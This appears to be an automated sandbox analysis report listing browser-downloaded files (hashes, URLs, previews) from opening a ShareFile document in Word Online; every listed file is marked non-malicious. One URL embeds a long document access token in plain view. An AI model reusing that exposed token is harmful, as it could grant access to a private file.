                                                                    SHA-256:02DCE113B180A446B7F5AE150FFB4DB22070A510CFB85C522CE6E4A4C11F2D77
                                                                    SHA-512:6DA14319CD30312DAA7BD1B59C958ED873A9941256E3AFFD0298CF3DBA36BEC0E5DE181D50C3F3AAEF495BC53AE4357E89A46154280A2951F4A322D6287FA8C2
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://ecs.office.com/config/v1/OneShell/1.0.0.0?agents=OneShell&IsConsumer=true&WorkloadId=WordOnline&TenantId=84df9e7f-e9f6-40af-b435-aaaaaaaaaaaa&UserId=&UPN=
                                                                    Preview:{"OneShell":{"UpdatedConsumerAppList":true,"M365StartEnabled":true,"DisableM365StartIntentsModule":false,"default":true},"Headers":{"ETag":"\"8M6C3IBLtb8mwT1KNreplkZ/i0rFbbeiyWPkxzwWrg0=\"","Expires":"Mon, 16 Dec 2024 09:48:21 GMT","CountryCode":"US","StatusCode":"200"},"ConfigIDs":{"OneShell":"P-R-1157040-4-8,P-R-1131228-4-17,P-D-1117449-1-4"}}
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:GIF image data, version 89a, 16 x 16
                                                                    Category:downloaded
                                                                    Size (bytes):668
                                                                    Entropy (8bit):4.238031919528392
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:B5F29A6E52D426B5F64843C7C962E228
                                                                    SHA1:8FB8B25BD264E83F21AC4514B0945B1570C0206E
                                                                    SHA-256:38E88B6AF6C6531959A5AD70F5310B60878DC948086A1D4107168B08CC44ECF7
                                                                    SHA-512:25DAB31A3CCB5CF024FBF28FC95AE64A498C876D35D26C9EFD7695335F56C74D073A39B67A6D9C3809B017461A49E3B66883153FBF47CDBA09B5BA02BED571F0
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://res-1.cdn.office.net/officeonline/hashed/38e88b6af6c65319/progress16.gif
                                                                    Preview:GIF89a.............!..NETSCAPE2.0.....!.......,......................{[..!.......,............Q.!.......,............Q.!.......,............Q.!.......,............Q.!.......,............Q.!.......,............Q.!.......,............Q.!.......,.................!.......,............Q.!.......,.............a...!.......,..................!.......,......................!.......,.....................X..!.......,........................!.......,.............a........!.......,..................!.......,......................!.......,.............p..........!.......,.............p....<o.S..!.......,................V..!.......,............Q.!.......,...........L..;
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (65475)
                                                                    Category:dropped
                                                                    Size (bytes):92470
                                                                    Entropy (8bit):5.302353203476037
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:362C328CC04F0AD32B39716193CC04CA
                                                                    SHA1:D80E3085BE939A35AE6EA97AFB40D345F37DC5B5
                                                                    SHA-256:A429E0386F190E4897230E9E34FD28803757AAA9818AA619E648CBDEEE60693D
                                                                    SHA-512:79B7897518DEA25BE38CCFACF0DE8FD5D26E0B98F608273C483E7B493EC438FEDFCB96EAC7B721134468843C2C9F5D78277814EA7E740DFA1F7558A919D93001
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview://@pilet v:2(webpackChunkpr_sharefiledevpermissionspilet,{}).System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router-dom","tslib"],(function(e,t){var n={},r={},o={},i={},a={},s={},u={};return Object.defineProperty(i,"__esModule",{value:!0}),{setters:[function(e){n.AccountsEntity=e.AccountsEntity,n.ContactListType=e.ContactListType,n.ContactsEntity=e.ContactsEntity,n.UserRole=e.UserRole},function(e){r.colorPalette=e.colorPalette,r.sizes=e.sizes},function(e){o.Alert=e.Alert,o.Avatar=e.Avatar,o.Badge=e.Badge,o.Button=e.Button,o.Card=e.Card,o.Checkbox=e.Checkbox,o.Col=e.Col,o.Collapse=e.Collapse,o.Divider=e.Divider,o.Drawer=e.Drawer,o.Dropdown=e.Dropdown,o.Flex=e.Flex,o.Form=e.Form,o.Input=e.Input,o.Layout=e.Layout,o.List=e.List,o.Modal=e.Modal,o.Popconfirm=e.Popconfirm,o.Row=e.Row,o.Select=e.Select,o.Skeleton=e.Skeleton,o.Space=e.Space,o.Spin=e.Spin,o.Switch=e.Switch,o.Tooltip=e.Tooltip,o.Typography=e.Typography,o.notification=e.notification
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (47691)
                                                                    Category:downloaded
                                                                    Size (bytes):47692
                                                                    Entropy (8bit):5.401573598696506
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:B0B3774E70E752266B4CF190E6D95053
                                                                    SHA1:03823D33D8C374DD69B66F1D75A5FC93D29967E1
                                                                    SHA-256:A9F0787E39291D7BCB873D0D514F1D2C8DB0256FD741C2ABC4D46A809254E141
                                                                    SHA-512:8060AA547C3F32930EC2A3786A6BB15054F396D8EAB238EA34E881C2EEAE0D013AF246FDDE85DA8A5BFC2690B1EB26E5138B45BAA28479264DB3BA458D4055A8
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://challenges.cloudflare.com/turnstile/v0/g/f9063374b04d/api.js
                                                                    Preview:"use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Ht(u,o,c,g,h,"next",l)}function h(l){Ht(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (65447)
                                                                    Category:downloaded
                                                                    Size (bytes):89501
                                                                    Entropy (8bit):5.289893677458563
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                    SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                    SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                    SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                                    Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Web Open Font Format (Version 2), TrueType, length 36944, version 1.0
                                                                    Category:downloaded
                                                                    Size (bytes):36944
                                                                    Entropy (8bit):7.9947025744425595
                                                                    Encrypted:true
                                                                    SSDEEP:
                                                                    MD5:167E1CF5FED6B58439CAC0F8CBC8B112
                                                                    SHA1:6257B8DB5BE9B64AC8DF883BD15F93549BC5FD3A
                                                                    SHA-256:87A8C06A966031596415B7D116BCDAD5FC51E32B613B386491094A87A0E36714
                                                                    SHA-512:28E992A22B4A41647CF94719E23DC9BE36B30875F59E3B6A0A35650EDEA5730C3991C14F14B46C150F95B21709B72952AC5E95DCC8FB65D29AEA80D0A163BBD0
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-dynamic-forms-pilet/1.51.0/package/dist/af15e31c70fab7cfd55c.woff2
                                                                    Preview:wOF2.......P.........................................x..\.`..D.`.............6.$..T..,.. ..V..;..=[.i..:..S.j..nC.....?..r......<iC,..."t'Zd-........d..n{n.?..$.t.<.#'.....2.... ..-...r.,r..!. .rr.....t..w....e.......r..]....2)4..T.L{..'."N^(.h.f .v:7..`.8......s.......;Ft.......!.m.*.>.....S..9M.C4....)../.....S.,..Ge...'\.......i.R.......PqAII..?x.Y^......?...1(..Sm.U\L..N...V.0..N.)....Y...K[..t.R....<.......K......6.......a6....@L*.....)...{$..d...7..V..<.........@........y.V.,.}...Y..<g...=...k.!g...(..T.......bY.......v......V``.........j...E..r]?c....hQ_..w......z.....v6......%d...L...1I....oj..k.{..c...b9.......D...a{\o+r...N.(I6.$V.R....[.....-....p?.....X.n.<.(O.1nqj.A.C....5.1....g.9.n....>=.~.=....P/..E3%.2.D..'..Db(.!..?g.G.....V......lm.....HW...D..!(......w..%....-\/..B.{H.{.._k.yn....c...Do.$Q./|662Fl.r..8....wE...(A.U....9e\yx(.11nF...m.!...TD;....#.K../.....8.n......-.......Sy.&D..R.6KA.w.vQOW].9..T...C....@..
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (22678), with no line terminators
                                                                    Category:downloaded
                                                                    Size (bytes):22678
                                                                    Entropy (8bit):5.231528829658149
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:D86BED237478797C4B148F2D828D568D
                                                                    SHA1:FE1122E6234A70FE4BE617BE164706E57F4E166B
                                                                    SHA-256:ACAEC5554B601F1D456E3C9440553EB58D2DC084A55894598CF8F9B4F41BBC8D
                                                                    SHA-512:8CEEDE3BB7C9C30CABFF2D2F98EF705B80ACA9F24488CB2CBCAE699B765D55F6B2814442C9910AD7DE10D6886BCA05AFE7B5A4799E89E763578583F22C350C5E
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://res-1.cdn.office.net/officeonline/versioned/suiteux-shell/4.0.73/js/suiteux.shell.umc_mecontrol.js
                                                                    Preview:var shellPerformance=window.performance,HighResolutionTimingSupported=!!shellPerformance&&"function"==typeof shellPerformance.mark;HighResolutionTimingSupported&&shellPerformance.mark("shell_umc_mecontrol_start"),(self["suiteux_shell_webpackJsonp_suiteux-main"]=self["suiteux_shell_webpackJsonp_suiteux-main"]||[]).push([["umc_mecontrol"],{50641:function(t,e,n){n.r(e),n.d(e,{UniversalMeControlConnector:function(){return M}});var o=n(63002),i=n(93814),r=n(87948),s=n(95422),a=n(2403);var l=n(90872),p=n(16968),d=n(47710);const h=5,u=500,c=1.5;function g(t,e,n,o){let i=document.createElement("script");if(i.src=window.O365ShellContext.TrustedTypesPolicies[d.TR].createScriptURL(t),i.crossOrigin="anonymous",i.async=!0,null!=e){i.onload=i=>{if(o){let r=Date.now()+200,s=()=>{o()?e(i):Date.now()>r?n({ResourceName:t,Details:12}):setTimeout((()=>{s()}),50)};s()}else e(i)},null!=n&&(i.onerror=(e,o,i,r,s)=>{n(function(t,e,n,o,i,r){let s;s="string"==typeof e?e:e.type;return{ResourceName:t,Details:`Scri
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (65459)
                                                                    Category:downloaded
                                                                    Size (bytes):654553
                                                                    Entropy (8bit):5.584369181284809
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:F0B717CE73E7C0CFF8A68CF2A407511A
                                                                    SHA1:2291EBCE8808C47A0A9A3E9E45996628EE5E8811
                                                                    SHA-256:270F978F9B5E383D411DFA2FF4E98015B44114363E57D0077E720A0BCDBBA240
                                                                    SHA-512:1B7AA3EEE16D8E4AFBBD1111F155D153F04DF7FA69F06EB086EB8763D2862569017FC78908F103A024191807F6002951D51807D073706C432B99E25357FB1A8C
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://res-1.cdn.office.net/officeonline/hashed/270f978f9b5e383d/copilotcommonux.min.js
                                                                    Preview:/*! For license information please see copilotCommonUx.min.js.LICENSE.txt */.(globalThis.wordOnlineChunks=globalThis.wordOnlineChunks||[]).push([[75685],{36735:function(e,t,r){"use strict";r.d(t,{A:function(){return B}});var n,o,i,a,c,l,u,s,f,d,p,h,v,g,m,b,y,w=r(90932),k=r(49612);function x(){return x=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var r=arguments[t];for(var n in r)Object.prototype.hasOwnProperty.call(r,n)&&(e[n]=r[n])}return e},x.apply(this,arguments)}const B=function(e){const t=(0,w.DG)(),r=(0,w.DG)(),B=(0,w.DG)(),z=(0,w.DG)(),_=(0,w.DG)(),S=(0,w.DG)();return k.createElement("svg",x({width:16,height:16,fill:"none",xmlns:"http://www.w3.org/2000/svg",display:"block"},e),k.createElement("path",{d:"M11.67 1.99c-.201-.592-.757-.99-1.381-.99h-.901c-.701 0-1.303.499-1.433 1.188l-.931 4.945.463-1.584a1.458 1.458 0 011.4-1.049h2.878l1.245 1.629L14.118 4.5h-.553c-.624 0-1.18-.398-1.38-.99l-.516-1.52z",fill:`url(#${S})`}),k.createElement("path
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Unicode text, UTF-8 text, with very long lines (65418), with no line terminators
                                                                    Category:downloaded
                                                                    Size (bytes):921187
                                                                    Entropy (8bit):5.409245963611842
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:AA3F664C0BBA50BB9DE78C63D960C86E
                                                                    SHA1:3684FB5FA90DE270F3CC66A80E8A59CA407DC29D
                                                                    SHA-256:6DA91EF8F9E80235E3EF06BCAB8BA822CBA43BF91BFF7163886EC854044FD692
                                                                    SHA-512:95FC45CBFD8F12199F1EAEA1E85A8473344BE17746C21502C211855F756810FA6ACEA2F21E18C4FFFA2CE9CF583D38169ED71A056019075EC417B29106C3FE8C
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://res-1.cdn.office.net/officeonline/hashed/6da91ef8f9e80235/wordviewerds.dll1.js
                                                                    Preview:"use strict";(globalThis.dullscriptWebpackJsonp=globalThis.dullscriptWebpackJsonp||[]).push([[1],{3562:function(e,t,i){i.d(t,{a:function(){return g}});var a=i(291),n=i(3393),s=i(5328),r=i(7862),o=i(5576),l=i(8649),c=i(8553);class d{get left(){return this._box.left}set left(e){this._box.left=e}get top(){return this._box.top}set top(e){this._box.top=e}get width(){return this._box.width}set width(e){this._box.width=e}get height(){return this._box.height}set height(e){this._box.height=e}get box(){return this._box}set box(e){this._box=e}get style(){return this._style}set style(e){this._style=e}get id(){return this._id}set id(e){this._id=e}get page(){return this._page}set page(e){this._page=e}get domElem(){return this._domElem}set domElem(e){this._domElem=e}addStyle(e){switch(this._style=e,e){case 1:Sys.UI.DomElement.addCssClass(this._domElem,"CommonHighlight WACHighlight");break;case 2:Sys.UI.DomElement.addCssClass(this._domElem,"WACActiveHighlight");break;case 3:Sys.UI.DomElement.addCssCla
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (28015)
                                                                    Category:downloaded
                                                                    Size (bytes):28073
                                                                    Entropy (8bit):5.5318582380739
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:014CAB9D2210FD48E184D496F311E62A
                                                                    SHA1:D58AF189956DBC4999D2152F492E2A6800953438
                                                                    SHA-256:F30929839D3ED351DF4A76144E1045254347069962E0A5245960C14302ADB395
                                                                    SHA-512:52469BAFB88DF96AF3240AA241D981BFD7F8518553EE5DF2E4C22047A71FC802CB723B4C32859344279781EF6B08BAE7CC8CCEE19C6854919A29D1B1856A36EC
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-identity-pilet/1.0.33/package/dist/index.js
                                                                    Preview://@pilet v:2(webpackChunkpr_sharefiledevidentitypilet,{}).System.register(["@sharefiledev/antd-config","antd","react","tslib"],(function(e,t){var r={},n={},a={},o={};return{setters:[function(e){r.colorPalette=e.colorPalette},function(e){n.Alert=e.Alert,n.Button=e.Button,n.Checkbox=e.Checkbox,n.Col=e.Col,n.Divider=e.Divider,n.Drawer=e.Drawer,n.Flex=e.Flex,n.Form=e.Form,n.Input=e.Input,n.Modal=e.Modal,n.Row=e.Row,n.Space=e.Space,n.Spin=e.Spin,n.Tag=e.Tag,n.Tooltip=e.Tooltip,n.Typography=e.Typography,n.notification=e.notification,n.theme=e.theme},function(e){a.Children=e.Children,a.Fragment=e.Fragment,a.createContext=e.createContext,a.createElement=e.createElement,a["default"]=e["default"],a.forwardRef=e.forwardRef,a.isValidElement=e.isValidElement,a.useContext=e.useContext,a.useEffect=e.useEffect,a.useRef=e.useRef,a.useState=e.useState,a.version=e.version},function(e){o.__awaiter=e.__awaiter,o.__rest=e.__rest}],execute:function(){e((()=>{var e,i,l,c,f={481:(e,t,r)=>{"use strict";r.d(t,{r
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:JSON data
                                                                    Category:downloaded
                                                                    Size (bytes):2280
                                                                    Entropy (8bit):4.99922490865693
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:60374322776EB1745628524D25FFDABD
                                                                    SHA1:BF54C973B6F5B46B39BBF492196B5B205C6B6629
                                                                    SHA-256:0A3F725ECD0AA9E367DD4BE6908D207B3288C3D83E0DA37804AA1F7A82B11CCE
                                                                    SHA-512:C95CBB51624F1DCEBA0B52949EEE38BC655ED9158A3DE45C38499B91F6FF10269F7EE9B8F2C18D14F143B84711C2BA3E1686CB4B179B1B82E6C1F84BC609577D
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://word-view.officeapps.live.com/wv/translation.ashx?WOPIsrc=https%3A%2F%2Fsf%2Dwopi2%2Dsharefile%2Duseast%2Esharefile%2Ecom%2Fservice%2Fwopi2%2Ffiles%2Ffi3adb26%2D6526%2D2a8b%2D1325%2Dbe724f6473ec&access_token=HVIyDuS62YBuah7i7VUIM7kP0uP7GVBLcn8EOGZeVX9iWBGc6Nn7zI5OhFj9fZmIPw7v3LaG4jrygHAalF%2BU3qDyvE6Yyb5VRx2IGazF%2BtXw4gO2%2Fy%2F8IDYh4GLzFR7sNZEAg8qvYExSDjK8pPadMdaM2D5WE4kFLdkpgzaepvFzPiUFFUhdS96xCGUXcguIv7cBgRiCic5fSbWyNnk8l%2FJg13JPasMuJsefvDwLeAG0d%2BYdCOgvPLgw2I6yLZPPnvuT9da%2FWUG972i4DiVzUn7up%2B2%2FR%2Baoqf4TnfmsQoLD%2B6qyNKWB6n6VUb757oWD3ssC%2FV8Zxs%2Bb%2FFxPNxxoynGtXh%2B5KK6pNXpQUN6Xf4RKaXCIU6rdATXkKLRK8FF1TqtLQmRbiiS3ZGG2nJgZ%2Bq8SgSNNzY1oz8ldB3x0SDmARWUtM%2B1qsdnnRFSydNonpuQi4ZN8ClYySk6xsyfxhK3ivqvWJjJ%2BwzDZNk7RXrPaOSh6pdUDd1NJWCB3wsDXciEPxIOuytjhyhgs26o2xIHGAFdhdaEZ%2FmvcNbaP0qK24FHl%2F5CFrDSw46QCoIucSW%2Bqyv0F120NtzJMtVwv%2B4TKYS0bA1r9zBGNy0BwvcbvInUqnUXb01aBFPVNSOcYYQpG61vjsHvgMoDL0tJ3W5%2FsZ7MtFfGlRC9jfX2zO5FNgEWXsngblWn0KlhHSst0qWyiWmtBe31eRXjuU%2FmKECPixp%2FVnq0w6DknEyIk%2FgLCmMK0FUFiL48YI1zwa%2B8swoVOYPwwPxGfSf2UqpX6BJVl%2FZMKmwmvIK1knEg3onqaQSBW%2FOs1p2H8fzXG0%2FxnIdw8klWEvt4443ZiNkt1LEUWTUFa81wEbvrc4fyzyWXhWTktCy9mG0dDfLlOWZhWpqm3a4v80sBp3YkRenwbuMynmcfzxIAbVWVR1FYk68EumbAQmxSIY2TkYmx63GyHi18tSKavBKAN6XWm50bYkCrlSvHFB%2BS7T2osVWwC%2BDjN1HzPSaTp6ANydtCk0QXl705szjwfaDwpO0r8aCFQPObsuECGyjPdzauVaPdYxuH%2FYDz119Wx1v5lkLQzO8bGte853JDpRfkRkbQBQzkBzU%2Fv3Ibr4J%2BxEDYTsXlZBjJp3AADK%2Bn3JnSL8aOV624qo7Rcu62OhvU8c2ZoUJoPnnw9tyWMHDmxaOfRAYV%2BbJE8ss%2BNuaSIXR1c5i7tn4tNVuaMs26vgdphtO3yl%2BHEBaZMhcvDrOe8QADlOi%2FrUajGkdRwhTrhV2y6OG4f2F5hSJg96cIl3rU%2BEb8Qyc3oN3xv48xDEpEtmYukBuTlHBcvvI0VqGtRu46ehMOc4emu90QHG%2FilFvZJQlw95ygoj63LpBBnwNuWczNt0jg%3D%3D&access_token_ttl=0&z=b10a0e2258bb8d307f8c2c09ec5a16e6&uilang=en-US
                                                                    Preview:{"TranslationLanguages":"af,sq,am,ar,hy,as,az,bn,ba,eu,bho,brx,bs,bg,yue,ca,hne,lzh,zh-chs,zh-cht,hr,cs,da,prs,dv,doi,nl,en,et,fo,fj,fil,fi,fr,fr-ca,gl,lug,ka,de,el,gu,ht,ha,he,hi,mww,hu,is,ig,id,ikt,iu,iu-latn,ga,it,ja,kn,ks,kk,km,rw,gom,ko,ku,kmr,ky,lo,lv,ln,lt,dsb,mk,mai,mg,ms,ml,mt,mni,mi,mr,mn-cyrl,mn-mong,my,ne,nb,nya,or,ps,fa,pl,pt,pt-pt,pa,otq,ro,run,ru,sm,sr-cyrl,sr-latn,st,nso,tn,sn,sd,si,sk,sl,so,es,sw,sv,ty,ta,tt,te,th,bo,ti,to,tr,tk,uk,hsb,ur,ug,uz,vi,cy,xh,yo,yua,zu,54,28,94,1,43,77,44,69,109,45,4096,4096,30746,2,4096,3,4096,4096,4,31748,26,5,6,140,101,4096,19,9,37,56,4096,100,11,12,3084,86,4096,55,7,8,71,4096,104,13,57,4096,14,15,112,33,4096,93,31837,60,16,17,75,96,63,83,135,4096,18,146,4096,64,84,38,4096,39,31790,47,4096,4096,62,76,58,88,129,78,30800,31824,85,97,31764,4096,72,99,41,21,22,2070,70,4096,24,4096,25,4096,27674,28698,48,108,50,4096,89,91,27,36,119,10,65,29,4096,73,68,74,30,81,115,4096,31,66,34,46,32,128,67,42,82,52,106,4096,53,Afrikaans,Albanian,Amharic,Arabi
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (65475)
                                                                    Category:dropped
                                                                    Size (bytes):1036348
                                                                    Entropy (8bit):5.817151661206228
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:EF6C50332B5E5E567F6A99C5D5F87E56
                                                                    SHA1:A34CB792FCA2BBFBC571A44F9C985087551A2DCC
                                                                    SHA-256:EEB76B0472A03DA11EC3081F315D44D8D47387040B8252C5944343A1F9A7D52A
                                                                    SHA-512:7C05821AF219393764D7F6B1D207288B4CD1F1536704A03EE3D30C0E1E396B2E7DB8859ACE6A16A57FB2F4CEF7EE89843ED99ED88E2A3B1448AC617EF92C4AD0
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview://@pilet v:2(webpackChunkpr_sharefiledevresourcegenpilet,{}).System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-router-dom","tslib"],(function(e,t){var n={},r={},i={},a={},s={},o={};return Object.defineProperty(a,"__esModule",{value:!0}),{setters:[function(e){n.Api=e.Api},function(e){r.colorPalette=e.colorPalette},function(e){i.Alert=e.Alert,i.Button=e.Button,i.Checkbox=e.Checkbox,i.Collapse=e.Collapse,i.DatePicker=e.DatePicker,i.Divider=e.Divider,i.Drawer=e.Drawer,i.Flex=e.Flex,i.Form=e.Form,i.Input=e.Input,i.Select=e.Select,i.Slider=e.Slider,i.Space=e.Space,i.Spin=e.Spin,i.Typography=e.Typography,i.theme=e.theme},function(e){Object.keys(e).forEach((function(t){a[t]=e[t]}))},function(e){s.Redirect=e.Redirect},function(e){o.__awaiter=e.__awaiter,o.__rest=e.__rest}],execute:function(){e((()=>{var e,l,c={5655:(e,t,n)=>{"use strict";n.d(t,{A:()=>ae});var r=function(){function e(e){var t=this;this._insertTag=function(e){var n;n=0===t.tags.length?t.insertio
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (15083), with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):15083
                                                                    Entropy (8bit):4.954599586400651
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:D45AA1DDDB1B77932D286FD707D3DF3A
                                                                    SHA1:4E740248EAC63F2660D144EC950C5F1225484D4A
                                                                    SHA-256:EE63044159D9A9DF840668412E00DEEC5F1B937A3002A894C0DD964C6247CFB5
                                                                    SHA-512:D11E42959558B93FA4CB21AD43C7A99467ECE9B514949DD5A56AEBF59D1F889916C2CBD57091BE1E8638F042F0095BCB934179DB1D3F116D6EA4266A5E943A5C
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:"use strict";var WacWordviewerStrings={HeaderText:"Find",NumberOfSearchedPages:"(in {0} of {1} pages)",ProgressTextManyResults:"{0} matches",ProgressTextNoResults:"No matches",ProgressTextOneResult:"1 match",ProgressTextSearching:"Searching...",ResultsInfoText:"(in 0 of {0} pages)",ResultToolTip:"[Page {0}]",SearchBoxValue:"Search for...",SearchButtonTitleBegin:"Search options",SearchButtonTitleEnd:"Clear search and other search options",NextButtonTitle:"Next Search Result",PrevButtonTitle:"Previous Search Result",SearchText:"Use the search box above to find text in your document.",SearchTextV2:"Search for a word or phrase in your document.",ReplaceText:"Search for a term in your document and enter the term that you would like to replace it with.",FindFilterLabelText:"({0})",FindMultipleFiltersLabelText:"({0}, {1})",SelectedSearchOption:"Selected search option: {0}",SelectedSearchOptions:"Selected search options: {0} and {1}",FindPlaceholderTooltip:"Search the {doctype} for...",MatchCa
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (386), with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):389
                                                                    Entropy (8bit):5.141061390134949
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:7BD00F3358368FAE2FACABFECD760702
                                                                    SHA1:8423F9122FAB2C29798B1DCA22E0C79A1A516ADC
                                                                    SHA-256:B99FC30587BCEF71BC30CEAD8867BD025546A2AA3B6AFC325CFCC8BD4541C7F5
                                                                    SHA-512:4A4F9527C59C4AD1ED0D51B549F8B6C8316D6B2D173637ACB403122DCAC2A5CB2AED32D40A0CE4DDCD5F19D6B766749ABAB212006C7950C5BC41B909D643E336
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:.<?xml version="1.0" encoding="utf-8"?><docdata><status>UnknownError</status><dialog><title>{webappfull}</title><description>Sorry, {webappshort} ran into a problem opening this {doctype} in a browser. To view this {doctype} please open it in the desktop version of {richclientfull}.</description><errorId>75787794-6c60-49c1-a989-f3347c5bd38b, 20241216004753</errorId></dialog></docdata>
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (65474)
                                                                    Category:dropped
                                                                    Size (bytes):179698
                                                                    Entropy (8bit):5.3787019331145745
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:BFA4A86354ADE2F9A354647C740B36D0
                                                                    SHA1:008C748CF50AFD48ED98397DC2802611CBC29D10
                                                                    SHA-256:45F6D875978F7BBAEB3C08C71CB2F636731B7AF31A98BA7DA25C029687EA5773
                                                                    SHA-512:F0DE4477F342C296B83FBF94EFFA5884D294AD684C51E3CC913907BF4F7D4D640F3651D6BBB11118D840C5494D7A4B530F8F357593B477AB878A084C1CE3A3BA
                                                                    Malicious:false
                                                                    Reputation:unknown
